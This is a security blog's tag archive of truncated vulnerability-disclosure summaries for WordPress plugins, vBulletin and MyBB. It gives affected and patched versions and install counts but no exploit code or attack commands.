During a routine research audit for our Sucuri Web Application Firewall, we discovered a cross-site scripting (XSS) vulnerability affecting 100,000+ users of the YITH WooCommerce Ajax Product Filter plugin. Current State of the Vulnerability This security bug was fixed in the 3.11.1 release. We are not aware of any exploit attempts currently using this vulnerability. […]
Tag Archives: Vulnerability Disclosure
Vulnerable Plugins: June 2020 Update
This is a mid-month update to our regular Monthly Vulnerability Digest, which reveals a number of new patches for disclosed vulnerabilities. Plugin Vulnerability Patched Version Installs Elementor Page Builder Authenticated Stored XSS 2.9.10 5000000 AdRotate Authenticated SQL Injection 5.8.4 40000 Brizy – Page Builder Improper Access Controls 1.0.126 60000 Careerfy Unauthenticated XSS 3.9.0 5000 SportsPress […]
OneTone Vulnerability Leads to JavaScript Cookie Hijacking
A vulnerability in the discontinued WordPress theme OneTone has been added to an ongoing campaign that is targeting vulnerable WordPress websites and causes malicious redirects through domains like ischeck[.]xyz. This specific wave uses the XSS vulnerability to inject malicious JavaScript and redirect visitors to the attacker’s landing page. The malware also detects and leverages existing […]
Authentication Bypass Vulnerability in InfiniteWP Client
An authentication bypass vulnerability affecting more than 300,000 InfiniteWP Client plugin users has recently been disclosed to the public. This plugin allows site owners to manage multiple websites from one central server using the InfiniteWP Server. Due to the nature of this plugin, this is a serious vulnerability that should be patched as soon as […]
Zero-Day RCE in vBulletin v5.0.0-v5.5.4
A new remote code execution (RCE) zero-day vulnerability has been disclosed by an anonymous researcher on the Full Disclosure mailing list this past Monday. This vulnerability is extremely severe. It allows any website visitors to run PHP code and shell commands on the site’s underlying server. Am I At Risk? At the time of writing this, […]
Dissecting the WordPress 5.2.3 Update
Last week, WordPress released version 5.2.3 which was a security and maintenance update, and as such, contained many security fixes. Part of our day to day work is to analyse these security releases, discover what security issue it is fixing and come up with a Proof of Concept for further internal testing. Based on our […]
Icegram Persistent Cross-Site Scripting
Icegram is a plugin that helps you collect email addresses for your newsletter. Other features include light-box popup offers, header action bars, toast notifications, and slide-in messengers. Versions 1.10.28.2 and lower are affected by a persistent Cross-Site Scripting in the admin area. This plugin has over 40,000 installations and any attacker with a subscriber account […]
Stored XSS in MyBB
The open source PHP forum software myBB recently published a new update, version 1.8.21. This is a security release fixing a Stored XSS vulnerability in the private messaging and post modules. What Are the Risks? Unpatched websites could allow bad actors to send booby-trapped posts or private messages to users. These would execute rogue JavaScript […]
OS Command Injection in WP-Database-Backup
On May 28th, a critical OS Command Injection vulnerability affecting the WP-Database-Backup plugin was disclosed to the public by the Wordfence team. This is a very nasty bug which made it possible for a bad actor to gain full control of affected websites — with over 70,000 reported active installs. Are You Affected? On April […]
Slimstat: Stored XSS from Visitors
The WordPress Slimstat plugin, which currently has over 100k installs, allows your website to gather analytics data for your WordPress website. It will track certain information such as the browser and operating system details, plus page visits to optimize the website analytics. Versions below 4.8.1 are affected by an unauthenticated stored XSS on the administrator […]
